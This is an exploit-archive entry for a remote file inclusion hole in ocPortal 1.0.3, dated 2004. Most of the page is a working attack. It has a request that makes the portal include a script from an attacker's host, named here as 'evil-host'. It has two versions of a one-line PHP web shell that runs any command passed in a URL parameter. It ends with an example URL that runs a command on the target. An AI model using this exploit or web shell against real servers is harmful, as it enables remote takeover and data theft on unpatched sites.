[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ocPortal 1.0.3 Remote File Inclusion
# Published : 2004-10-13
# Author : Exoduks
# Previous Title : WordPress Blog HTTP Splitting Vulnerability
# Next Title : Silent Storm Portal Multiple Vulnerabilities
http://localhost/ocp-103/index.php?req_path=http ://evil-host/
On your evil host you must put scipt funcs.php.
Example of funcs.php if your host doesn't support php.
<?php
$com = $_GET["com"];
system ("$com");
?>
Example of funcs.php if your host support php.
<?php
echo '<?php $com = $_GET["com"]; system ("$com"); ?>';
?>
http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls
# www.Syue.com [2004-10-13]